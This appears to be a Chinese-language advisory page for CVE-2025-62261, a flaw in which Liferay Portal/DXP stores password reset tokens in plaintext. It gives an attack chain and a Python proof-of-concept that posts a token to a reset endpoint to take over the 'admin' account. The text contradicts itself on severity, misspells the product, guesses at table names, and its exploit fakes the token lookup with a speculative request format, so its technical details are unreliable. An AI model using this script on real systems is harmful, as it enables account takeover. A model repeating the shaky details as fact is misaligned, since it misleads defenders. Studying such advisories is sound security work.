CVE-2025-62261 Liferay Portal/DXP密码重置令牌明文存储漏洞

漏洞信息

漏洞编号

CVE-2025-62261

漏洞类型

敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Liferay Portal, Liferay DXP

漏洞概述

CVE-2025-62261是Liferay Portal和DXP产品中的一个高危安全漏洞。该漏洞源于密码重置令牌以明文形式存储在数据库中，攻击者若能获取数据库访问权限，即可直接读取这些令牌。利用这些令牌，攻击者可以绕过正常的密码重置流程，任意重置任意用户的密码，从而实现账户接管。漏洞影响Liferay Portal 7.4.0至7.4.3.99版本以及多个DXP版本。由于密码重置功能是用户身份验证和账户恢复的核心组件，该漏洞对系统的安全性构成严重威胁。一旦攻击者获得数据库访问权限，即可利用明文存储的令牌轻松实施账户接管攻击。

技术细节

漏洞根因在于Liferay在实现密码重置功能时，将生成的密码重置令牌（通常为UUID或随机字符串）以明文形式存储在数据库的某个表中，未进行任何加密或哈希处理。正常的安全实践是使用一次性哈希值存储令牌，验证后立即失效。但Liferay的实现中，令牌以可读形式存储。攻击者获取数据库访问权限后，可通过以下方式利用：1) 查询存储密码重置令牌的表；2) 获取目标用户的有效令牌；3) 构造密码重置请求，使用获取的令牌完成验证；4) 设置新密码并接管账户。攻击的关键在于数据库访问权限的获取，可通过SQL注入、备份文件泄露、配置错误或内部人员恶意行为等途径实现。

攻击链分析

STEP 1

步骤1: 获取数据库访问权限

攻击者通过SQL注入、备份文件泄露、配置错误或内部人员等途径获取Lifteray数据库的访问权限

STEP 2

步骤2: 查询密码重置令牌表

在数据库中定位存储密码重置令牌的表（通常是User_或类似命名的表），执行SELECT查询获取目标用户的明文令牌

STEP 3

步骤3: 构造密码重置请求

使用获取的明文令牌，构造HTTP POST请求到Lifteray的密码更新端点，包含用户名、令牌和新密码

STEP 4

步骤4: 完成账户接管

服务器验证令牌有效后，更新用户密码。攻击者使用新密码登录目标账户，实现完全账户接管

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62261 PoC - Liferay Password Reset Token Exploitation
# This PoC demonstrates the exploitation of plaintext password reset token storage

import requests
import json
import time

TARGET_URL = "https://target-liferay-instance.com"
ATTACKER_DB_ACCESS = True  # Simulating database access

def get_plaintext_token_from_db(username):
    """
    Simulate database query to retrieve plaintext password reset token
    In real scenario, this would be an SQL query or direct database access
    """
    # Example SQL: SELECT password_reset_token FROM User_ WHERE screenName = 'target_user'
    # Token would be stored in plaintext like: 'a1b2c3d4-e5f6-7890-abcd-ef1234567890'
    mock_token = "a1b2c3d4-e5f6-7890-abcd-ef1234567890"
    return mock_token

def reset_password_via_token(username, token, new_password):
    """
    Use the obtained token to reset user password
    """
    reset_endpoint = f"{TARGET_URL}/c/portal/update_password"
    
    payload = {
        "p_u_i_d": username,
        "passwordResetToken": token,
        "password1": new_password,
        "password2": new_password
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.post(reset_endpoint, json=payload, headers=headers, verify=False, timeout=30)
        return response.status_code, response.text
    except requests.RequestException as e:
        return None, str(e)

def exploit(username, new_password="HackedP@ss123"):
    """
    Main exploitation function
    """
    print(f"[*] Starting exploitation for user: {username}")
    
    # Step 1: Get plaintext token from database
    token = get_plaintext_token_from_db(username)
    print(f"[+] Obtained plaintext token: {token}")
    
    # Step 2: Use token to reset password
    print(f"[*] Attempting password reset...")
    status, response = reset_password_via_token(username, token, new_password)
    
    if status == 200:
        print(f"[+] SUCCESS: Password reset completed for {username}")
        print(f"[+] New password set: {new_password}")
        return True
    else:
        print(f"[-] FAILED: Status {status}, Response: {response}")
        return False

if __name__ == "__main__":
    # Target configuration
    target_user = "admin"
    exploit(target_user)

影响范围

Liferay Portal < 7.4.0 (不受影响)

Liferay Portal 7.4.0 - 7.4.3.99 (受影响)

Liferay DXP 2023.Q3.1 - 2023.Q3.4 (受影响)

Liferay DXP 7.4 GA - update 92 (受影响)

Liferay DXP 7.3 GA - update 34 (受影响)

Liferay DXP 旧版本 (受影响)

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 严格限制数据库访问权限，确保只有必要的管理账户有访问权；2) 启用数据库加密和静态数据加密；3) 实施数据库操作审计日志；4) 启用双因素认证降低账户接管风险；5) 监控密码重置功能的异常使用模式；6) 定期更换管理账户密码；7) 审查并限制可能导数据库访问的网络路径。